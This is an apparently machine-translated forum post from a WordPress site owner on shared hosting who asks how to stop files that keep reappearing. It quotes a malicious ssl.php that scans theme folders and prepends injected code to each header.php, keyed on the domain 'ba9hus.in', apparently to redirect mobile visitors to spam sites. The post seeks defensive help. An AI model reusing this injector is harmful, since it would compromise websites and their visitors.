注意到网站根文件夹上有一些不需要的文件，并将其删除。我找到了那个标题。php文件包含一些恶意代码，这些代码只能重定向到移动浏览器上的垃圾邮件网站。

当这些文件存在时。htaccess pretty permalinks不起作用。

我已经更改了Cpanel、FTP密码。已删除以下列出的不需要的文件。已扫描所有文件和文件夹。

在干净地安装wordpress和插件之后，会重复添加这些文件。

服务器：使用Cpanel/FileZilla的共享主机/linux服务器文件传输

如何阻止这些重复的攻击？

恶意脚本列表。

ssl。php有以下代码

if (file_exists("wp-content"))
{
if (file_exists("wp-content/themes"))
{
    $dirs = scandir("wp-content/themes");
    foreach ($dirs as $dir)
    {
        if ((is_dir("wp-content/themes/$dir")) AND ($dir !== ".") AND ($dir !== "..")) 
        {
            if (file_exists("wp-content/themes/$dir/header.php")) 
            {
                          $file = fopen("wp-content/themes/".$dir."/header.php", "r");  
                          $buffer = fread($file, filesize("wp-content/themes/".$dir."/header.php")); 
                          fclose($file);    
               if (eregi(\'ba9hus.in\', $buffer)==0) 
               { 

                            $in = fopen("wp-content/themes/".$dir."/header.php", "w");
                             fwrite($in, $code);
                             fwrite($in, $buffer);
                             fclose($in);
                /*       
                   $in = fopen("wp-content/themes/$dir/header.php", "a");
                   fwrite($in, $code);
                   fclose($in);
                   */
               }
            }
        }
    }
}
}

ssl。php可湿性粉剂ssl。php可湿性粉剂ssl。zip新闻解析器。班php